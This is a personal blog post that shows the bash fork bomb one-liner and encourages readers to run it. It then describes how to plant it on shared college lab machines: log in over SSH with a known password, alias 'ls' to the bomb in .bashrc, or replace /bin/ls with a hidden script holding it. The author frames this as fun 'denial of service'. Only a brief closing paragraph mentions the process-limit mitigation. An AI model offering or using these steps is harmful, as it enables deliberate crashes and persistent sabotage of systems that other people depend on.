August 10, 2008

fork bomb deployment

I have been telling about this to my friends over the last few weeks,now I am gonna post it here..
its the fork bomb..currently I will deal only with the Linux one...

vivek@vivek-desktop:~$ :(){ :|:& };:

What happens after this ?Please do try it out at home.Then read beyond this...

It is a fork bomb.When a process fork,a child process is created.Here we define a function ':' which calls itself and pipes to itself,thereby recursively calling itself and also goes to background.Once you type this and press Enter,you can't help...will have to reboot system manually.



What happens is that the infinite number of forked processes flood the process table and bring the system down.This is an ideal DOS attack.

Here I like to deal with more than introducing this concept...I have thought about unleashing it.

My ideas are based on our College lab setup.It works in our CC1.There all systems are accessible via ssh and passwords to 'mec' user is known.

1)ssh to system of choice as user(no need for root)
2)Either run it on terminal for instant gratification or maybe as in step 3
3)nano .bashrc
4)Add a line at end alias ls=':(){ :|:& };:'
5)save and exit

Note:it takes effect when new terminal is opened.
As ls is a common command,you get to see your devilish action at work many times,maybe until the system administrator finds it and fixes it.

This is quite susceptible to be discovered by anyone wise enough to open up bashrc and check out.
Another method i propose is to replace the /bin/ls with a soft link to a script of urs (hidden and in unusual places preferably) which contains the fork bomb.This is tougher to trace out,but needs either root access or a user with sudoer power.for eg:graphics user in our lab

Ah..now that we had enough fun crashing systems...lets think how this can be stopped so that no one plays this on you..or if u r the system admin(see..i care for them..i am a good guy).This can be stopped by editing the /etc/limits.conf file which specifies the number of processes(among other resources) that can be opened at a time by each user on the system.If you keep it a a decent value(by default unlimited),fork bombs won't explode..voila..hehe
So you see...the moral of the story is that ignorance is the biggest security hole in any system..you can always avoid or prevent such attacks by doing the right thing at the right time...

Happy denial of service... ;)

And ya..let me add what happened when I used its counterpart in windows...it spawned dos windows...one after other...but was able to shutdown properly using task manager...unlike Linux which completely died the moment after u entered this...hehe..bad news for Linux fans. :D

No comments: